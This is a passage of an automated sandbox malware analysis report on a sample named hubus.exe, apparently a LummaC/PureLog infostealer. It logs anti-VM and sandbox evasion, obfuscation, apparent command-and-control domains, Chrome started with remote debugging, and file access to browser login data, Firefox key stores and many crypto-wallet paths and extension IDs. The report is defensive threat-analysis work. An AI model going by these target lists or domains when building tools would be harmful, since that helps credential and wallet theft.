                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                          Source: hubus.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                          Source: hubus.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                          Source: hubus.exeStatic file information: File size 1361408 > 1048576
                          Source: hubus.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x14bc00
                          Source: hubus.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: hubus.exe, 00000000.00000002.12084979136.0000000004235000.00000004.00000800.00020000.00000000.sdmp, hubus.exe, 00000000.00000002.12084979136.0000000004021000.00000004.00000800.00020000.00000000.sdmp, hubus.exe, 00000000.00000002.12088688040.0000000005C00000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: hubus.exe, 00000000.00000002.12084979136.0000000004235000.00000004.00000800.00020000.00000000.sdmp, hubus.exe, 00000000.00000002.12084979136.0000000004021000.00000004.00000800.00020000.00000000.sdmp, hubus.exe, 00000000.00000002.12088688040.0000000005C00000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: protobuf-net.pdbSHA256}Lq source: hubus.exe, 00000000.00000002.12088018857.0000000005A30000.00000004.08000000.00040000.00000000.sdmp, hubus.exe, 00000000.00000002.12084979136.0000000004021000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: protobuf-net.pdb source: hubus.exe, 00000000.00000002.12088018857.0000000005A30000.00000004.08000000.00040000.00000000.sdmp, hubus.exe, 00000000.00000002.12084979136.0000000004021000.00000004.00000800.00020000.00000000.sdmp

                          Data Obfuscation

                          barindex
                          .NET source code contains method to dynamically call methods (often used by packers)
                          Source: hubus.exe, x7M8VDknD2gjeiKYIQ.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                          Source: 0.2.hubus.exe.412bf98.0.raw.unpack, jHbxqbxSp2bmg9amyFB.cs.Net Code: Type.GetTypeFromHandle(paqyAubfXBuEjLZ0mHB.oSbSI0AQaR(16777347)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(paqyAubfXBuEjLZ0mHB.oSbSI0AQaR(16777252)),Type.GetTypeFromHandle(paqyAubfXBuEjLZ0mHB.oSbSI0AQaR(16777284))})
                          Yara detected Costura Assembly Loader
                          Source: Yara matchFile source: 0.2.hubus.exe.5c90000.7.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.12089048630.0000000005C90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.12074166269.00000000030B7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: hubus.exe PID: 428, type: MEMORYSTR
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 0_2_05A88C06 push esi; iretd 0_2_05A88C07
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 0_2_05AB6123 pushfd ; iretd 0_2_05AB6129
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 0_2_05AE469F push ds; ret 0_2_05AE46B9
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 0_2_05AE70FC push edi; ret 0_2_05AE7106
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_0043DA00 push eax; mov dword ptr [esp], F9F8F7A6h1_2_0043DA02
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_00446233 pushfd ; iretd 1_2_00446242
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_004462A7 pushfd ; iretd 1_2_00446242
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_0043AC40 push eax; mov dword ptr [esp], E2E3E4E5h1_2_0043AC4E
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_00443F28 push esp; iretd 1_2_00443F3C
                          Source: hubus.exeStatic PE information: section name: .text entropy: 7.791442134557085
                          Source: hubus.exe, KRDgtHoDHqbkhSfHPxV.csHigh entropy of concatenated method names: 'qCPsgcOkLo', 'Q3hsxG1jbi', 'r9GsDwgea9', 'v6rsRnEGMj', 'FRdsPWi4UY', 'Ns8s5c8nHW', 'kvhsZcmUSe', 'HUAUcMdSw4', 'kcds0rBWBO', 'lwosdsYqGk'
                          Source: hubus.exe, x7M8VDknD2gjeiKYIQ.csHigh entropy of concatenated method names: 'ftuLFDCcKwnJFpiViv7', 'ejZc4jCaIieyMSvZlhG', 'DMF42QpxCW', 'GHaeKfCXdbZGerqe4nY', 'CfjWLjCpLtBP5fGHdIK', 'USNfZWCHKkkjEanxyq4', 'guu3WSCOJt39uWipaxC', 'zfKKbyClQIVFP23bihA', 'tETGZFCft7w1LfVrfkG', 'V5KclWCMsh4bcTTq5sv'
                          Source: 0.2.hubus.exe.412bf98.0.raw.unpack, tXR9HabC0UMhs4GmYlK.csHigh entropy of concatenated method names: 'TUMbXgi1I6', 'eOUbI1CbLT', 'gTEbzF6xyy', 'kQODOHqfmh', 'M46DyWCxZO', 'fbwD7h1HA8', 'iRiDLeSCxJ', 'H4LDsMAZYY', 'rfPD5UnbQY', 'Eq9DQ986Rp'
                          Source: 0.2.hubus.exe.412bf98.0.raw.unpack, jHbxqbxSp2bmg9amyFB.csHigh entropy of concatenated method names: 'DmTaDwBa2sELgD4F3TG', 'y9m6QPB4TistDZjQ4qA', 'wngbMVpryc', 'vh0ry9Sq2v', 'IFwbEJ9gfE', 'J9EbFmfj26', 'mLUbwxGhs1', 'cN8b1ie17g', 'fdTSZYHm6y', 'aJfxJKQGkK'
                          Source: 0.2.hubus.exe.412bf98.0.raw.unpack, Rm7KF5Des53FJly9wlo.csHigh entropy of concatenated method names: 'QjGnI1c8ab', 'NQQnzqvEmQ', 'nYCMOYIYKQ', 'JKZMytjdLB', 'iZoM7hJUeX', 'YKLMLqfFYX', 'QaTMsObBWO', 'wevD6XvigE', 'D3yM5tqW9I', 'wSHMQggoAG'
                          Source: C:\Users\user\Desktop\hubus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                          Malware Analysis System Evasion

                          barindex
                          Yara detected AntiVM3
                          Source: Yara matchFile source: Process Memory Space: hubus.exe PID: 428, type: MEMORYSTR
                          Query firmware table information (likely to detect VMs)
                          Source: C:\Users\user\Desktop\hubus.exeSystem information queried: FirmwareTableInformationJump to behavior
                          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                          Source: hubus.exe, 00000000.00000002.12074166269.00000000030B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                          Source: C:\Users\user\Desktop\hubus.exeMemory allocated: 2E50000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeMemory allocated: 3020000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeMemory allocated: 5020000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exe TID: 7612Thread sleep time: -150000s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exe TID: 4136Thread sleep time: -30000s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                          Source: hubus.exe, 00000000.00000002.12074166269.00000000030B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                          Source: hubus.exe, 00000001.00000002.12268716447.000000000156A000.00000004.00000020.00020000.00000000.sdmp, hubus.exe, 00000001.00000002.12268716447.000000000152C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: hubus.exe, 00000000.00000002.12074166269.00000000030B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                          Source: chrome.exe, 00000002.00000002.12177623785.000001CD6146E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: C:\Users\user\Desktop\hubus.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeCode function: 1_2_0043C160 LdrInitializeThunk,1_2_0043C160
                          Source: C:\Users\user\Desktop\hubus.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeMemory allocated: page read and write | page guardJump to behavior

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          LummaC encrypted strings found
                          Source: hubus.exe, 00000000.00000002.12084979136.0000000004300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: rapeflowwj.lat
                          Source: hubus.exe, 00000000.00000002.12084979136.0000000004300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: crosshuaht.lat
                          Source: hubus.exe, 00000000.00000002.12084979136.0000000004300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sustainskelet.lat
                          Source: hubus.exe, 00000000.00000002.12084979136.0000000004300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: aspecteirs.lat
                          Source: hubus.exe, 00000000.00000002.12084979136.0000000004300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: energyaffai.lat
                          Source: hubus.exe, 00000000.00000002.12084979136.0000000004300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: necklacebudi.lat
                          Source: hubus.exe, 00000000.00000002.12084979136.0000000004300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: discokeyus.lat
                          Source: hubus.exe, 00000000.00000002.12084979136.0000000004300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: grannyejh.lat
                          Source: hubus.exe, 00000000.00000002.12084979136.0000000004300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: testyhurriedo.click
                          Source: C:\Users\user\Desktop\hubus.exeProcess created: C:\Users\user\Desktop\hubus.exe "C:\Users\user\Desktop\hubus.exe"Jump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"Jump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeQueries volume information: C:\Users\user\Desktop\hubus.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                          Source: hubus.exe, 00000001.00000002.12268716447.0000000001542000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                          Source: C:\Users\user\Desktop\hubus.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                          Stealing of Sensitive Information

                          barindex
                          Yara detected LummaC Stealer
                          Source: Yara matchFile source: Process Memory Space: hubus.exe PID: 4780, type: MEMORYSTR
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                          Yara detected PureLog Stealer
                          Source: Yara matchFile source: hubus.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.hubus.exe.a70000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000000.11852643145.0000000000A72000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Yara detected zgRAT
                          Source: Yara matchFile source: hubus.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.hubus.exe.a70000.0.unpack, type: UNPACKEDPE
                          Found many strings related to Crypto-Wallets (likely being stolen)
                          Source: hubus.exe, 00000001.00000002.12268716447.000000000155E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
                          Source: hubus.exe, 00000001.00000002.12268716447.000000000155E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                          Source: hubus.exe, 00000001.00000002.12268716447.000000000155E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                          Source: hubus.exe, 00000001.00000002.12268716447.0000000001594000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
                          Source: hubus.exe, 00000001.00000002.12268716447.0000000001594000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                          Source: hubus.exe, 00000001.00000002.12268716447.0000000001594000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
                          Source: hubus.exe, 00000001.00000002.12268716447.000000000155E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                          Source: hubus.exe, 00000001.00000002.12270439971.00000000015E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                          Source: hubus.exe, 00000000.00000000.11852643145.0000000000A72000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: set_UseMachineKeyStore
                          Tries to harvest and steal browser information (history, passwords, etc)
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqliteJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cert9.dbJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\prefs.jsJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\formhistory.sqliteJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.dbJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                          Source: C:\Users\user\Desktop\hubus.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
